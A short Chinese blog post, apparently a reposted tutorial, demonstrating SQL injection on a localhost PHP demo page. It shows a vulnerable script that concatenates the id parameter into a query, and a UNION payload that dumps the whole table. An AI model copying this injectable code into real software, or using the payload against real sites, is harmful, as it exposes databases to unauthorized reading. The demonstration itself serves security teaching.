简单的sql注入，安全第一

来源：互联网发布：山东省卫计委网络直报编辑：程序博客网时间：2024/05/03 00:30

url：http://localhost/safe/get.php?id=2

output：

select * from demo where id =2

Array(    [0] => Array        (            [name] => grt            [id] => 2        ))

source code：

<?php$con=mysql_connect('localhost','root','root');mysql_select_db('demo');$_GET['id']=empty($_GET['id'])?1:$_GET['id'];echo $sql='select * from demo where id ='.$_GET['id'];$db=mysql_query($sql,$con);while ($row=mysql_fetch_assoc($db)) {$res[]=$row;# code...}echo '<pre>';print_r($res);

sql：url: ocalhost/safe/get.php?id=2 union select * from demo

output::

select * from demo where id =2 union select * from demo

Array(    [0] => Array        (            [name] => grt            [id] => 2        )    [1] => Array        (            [name] => adass12            [id] => 1        )    [2] => Array        (            [name] => afa            [id] => 3        )    [3] => Array        (            [name] => 12asdf            [id] => 4        )    [4] => Array        (            [name] => adfa            [id] => 5        )    [5] => Array        (            [name] => adsf            [id] => 6        ))

0 0